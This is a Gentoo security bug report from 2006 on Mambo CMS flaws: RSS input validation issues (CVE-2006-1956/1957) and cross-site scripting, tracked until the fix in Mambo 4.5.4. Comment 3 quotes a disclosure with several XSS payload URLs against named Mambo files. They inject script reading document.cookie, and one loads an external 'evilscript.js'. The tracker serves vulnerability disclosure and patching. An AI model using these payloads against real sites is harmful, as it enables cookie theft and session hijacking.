Bug 130584

Summary:	www-apps/mambo - unvalidated user input in rss component (CVE-2006-195{6\|7})
Product:	Gentoo Security	Reporter:	Carsten Lohrke (RETIRED) <carlo>
Component:	Vulnerabilities	Assignee:	Gentoo Security <security>
Status:	RESOLVED FIXED
Severity:	trivial	CC:	web-apps
Priority:	High
Version:	unspecified
Hardware:	All
OS:	Linux
Whiteboard:	~3 [noglsa]
Package list:		Runtime testing required:	---

Description Carsten Lohrke (RETIRED) gentoo-dev

2006-04-20 03:48:45 UTC

The Script does not properly validate user-supplied input in rss.php.A remote user can supply a specially crafted URL to cause the system to display an error message that discloses the installation Path or force the script to create Tons of superfluous xml files which in some cases result in remote DoS attacks against target.


http://www.kapda.ir/advisory-313.html

Comment 1 Carsten Lohrke (RETIRED) gentoo-dev

2006-04-20 05:16:41 UTC

Apparently this has been fixed in Joomla 1.0.8 (bug 124082), but not in Mambo.

Comment 2 Thierry Carrez (RETIRED) gentoo-dev

2006-04-21 09:57:39 UTC

web-apps: not sure there is a fix published for this ?

Comment 3 Raphael Marichez (Falco) (RETIRED) gentoo-dev

2006-05-25 06:56:39 UTC

Hi,

and XSS vuln has also been reported by rgod (http://archives.neohapsis.com/archives/bugtraq/2006-05/0491.html)

i don't fill a new bug beacuse AFAIK, this XSS vuln is still in [upstream] status, the gravity is minor (~4) , and the ebuild is ~arched.


Mambo <= 4.6. RC1 Cross Site Scripting

---------------------------------------

http://[target]/[path_to_mambo]/administrator/popups/index3pop.php?mosConfig_sitename=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/popupImage.php?img_title=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?cur_colour=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?func=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?block=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?image_src=http://location/evilscript.js
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

---------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org

Comment 4 Raphael Marichez (Falco) (RETIRED) gentoo-dev

2006-05-25 06:57:24 UTC

Concerning the RSS vuln, it's CVE-2006-1956 and CVE-2006-1957

Comment 5 Stuart Herbert (RETIRED) gentoo-dev

2006-05-31 00:31:21 UTC

UPSTREAM have released Mambo 4.5.4 day before yesterday.  I'll snag a copy, and see if it addresses these problems.

Best regards,
Stu

Comment 6 Raphael Marichez (Falco) (RETIRED) gentoo-dev

2006-06-11 13:39:01 UTC

(In reply to comment #5)
> UPSTREAM have released Mambo 4.5.4 day before yesterday.  I'll snag a copy, and
> see if it addresses these problems.
> 

Hi, Stuart; your conclusion ?

Comment 7 Renat Lumpau (RETIRED) gentoo-dev

2006-06-17 17:35:33 UTC

4.5.4 is in the tree, 4.5.3h removed. From the changelog:

5. Patched a low risk RSS vulnerability

Comment 8 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2006-06-22 11:22:01 UTC

Thx Renat. Closing with no GLSA.